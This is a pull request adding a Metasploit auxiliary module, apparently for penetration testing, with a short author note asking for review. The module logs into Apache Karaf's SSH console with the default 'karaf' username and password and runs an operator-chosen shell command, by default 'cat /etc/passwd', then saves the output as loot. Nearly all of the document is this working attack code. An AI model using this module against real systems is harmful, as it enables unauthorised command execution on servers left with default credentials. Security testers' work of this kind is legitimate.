### PR TITLE
Adding Apache Karaf Command Execution Module

### DIFF
--- a/modules/auxiliary/gather/apache_karaf_command_execution.rb
+++ b/modules/auxiliary/gather/apache_karaf_command_execution.rb
@@ -1,0 +1,129 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'net/ssh'
+
+class Metasploit3 < Msf::Auxiliary
+  include Msf::Auxiliary::Scanner
+  include Msf::Auxiliary::Report
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "Apache Karaf Default Credentials Command Execution",
+      'Description'    => %q{
+        This module exploits a default misconfiguration flaw on Apache Karaf versions 2.x-4.x.
+        The 'karaf' user has a known default password, which can be used to login to the
+        SSH service, and execute operating system commands from remote.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Nicholas Starke <nick@alephvoid.com>'
+        ],
+      'Platform'       => 'unix',
+      'Arch'           => ARCH_CMD,
+      'Targets'        =>
+        [
+          ['Apache Karaf', {}],
+        ],
+      'Privileged'     => true,
+      'DisclosureDate' => "Feb 9 2016",
+      'DefaultTarget'  => 0))
+
+    register_options(
+      [
+        Opt::RPORT(8101),
+        OptString.new('USERNAME', [true, 'Username', 'karaf']),
+        OptString.new('PASSWORD', [true, 'Password', 'karaf']),
+        OptString.new('CMD', [true, 'Command to Run', 'cat /etc/passwd'])
+      ], self.class
+    )
+
+    register_advanced_options(
+      [
+        Opt::Proxies,
+        OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]),
+        OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30])
+      ]
+    )
+  end
+
+  def rport
+    datastore['RPORT']
+  end
+
+  def username
+    datastore['USERNAME']
+  end
+
+  def password
+    datastore['PASSWORD']
+  end
+
+  def cmd
+    datastore['CMD']
+  end
+
+  def do_login(user, pass, ip)
+    opts = {
+      :auth_methods => ['password'],
+      :msframework  => framework,
+      :msfmodule    => self,
+      :port         => rport,
+      :disable_agent => true,
+      :config => false,
+      :password => pass,
+      :record_auth_info => true,
+      :proxies => datastore['Proxies']
+    }
+
+    opts.merge!(:verbose => :debug) if datastore['SSH_DEBUG']
+
+    begin
+      ssh = nil
+      ::Timeout.timeout(datastore['SSH_TIMEOUT']) do
+        ssh = Net::SSH.start(ip, user, opts)
+      end
+    rescue Rex::ConnectionError
+      return
+    rescue Net::SSH::Disconnect, ::EOFError
+      print_error "#{ip}:#{rport} SSH - Disconnected during negotiation"
+      return
+    rescue ::Timeout::Error
+      print_error "#{ip}:#{rport} SSH - Timed out during negotiation"
+      return
+    rescue Net::SSH::AuthenticationFailed
+      print_error "#{ip}:#{rport} SSH - Failed authentication"
+    rescue Net::SSH::Exception => e
+      print_error "#{ip}:#{rport} SSH Error: #{e.class} : #{e.message}"
+      return
+    end
+
+    if ssh
+      print_good("#{ip}:#{rport}- Login Successful with '#{user}:#{pass}'")
+    else
+      print_error "#{ip}:#{rport} - Unknown error"
+    end
+    ssh
+  end
+
+  def run_host(ip)
+    print_status("#{ip}:#{rport} - Attempt to login...")
+    ssh = do_login(username, password, ip)
+    if ssh
+      output = ssh.exec!("shell:exec #{cmd}\n").to_s
+      if output
+        print_good("#{ip}:#{rport} - Command successfully executed.  Output: #{output}")
+        store_loot("apache.karaf.command",
+                "text/plain",
+                ip,
+                output)
+      else
+        print_error "#{ip}:#{rport} - Command failed to execute"
+      end
+    end
+  end
+end

--- a/modules/auxiliary/gather/apache_karaf_command_execution.rb
+++ b/modules/auxiliary/gather/apache_karaf_command_execution.rb
@@ -121,6 +121,7 @@ class Metasploit3 < Msf::Auxiliary
                 "text/plain",
                 ip,
                 output)
+        vprint_status("#{ip}:#{rport} - Loot stored at: apache.karaf.command")
       else
         print_error "#{ip}:#{rport} - Command failed to execute"
       end


### PR DESCRIPTION
This module establishes an SSH session using default
credentials and then executes a user defined operating system
command.  This is part of GitHub Issue #4358.

I think this module needs a lot of work.  It functions properly but I believe it has some code style issues surrounding exception handling.  It also writes to loot, and I'm not sure if that is proper or not. The default command may not be appropriate either. Also, I'm not sure the module is placed properly in the module hierarchy.  Please tear this PR apart.
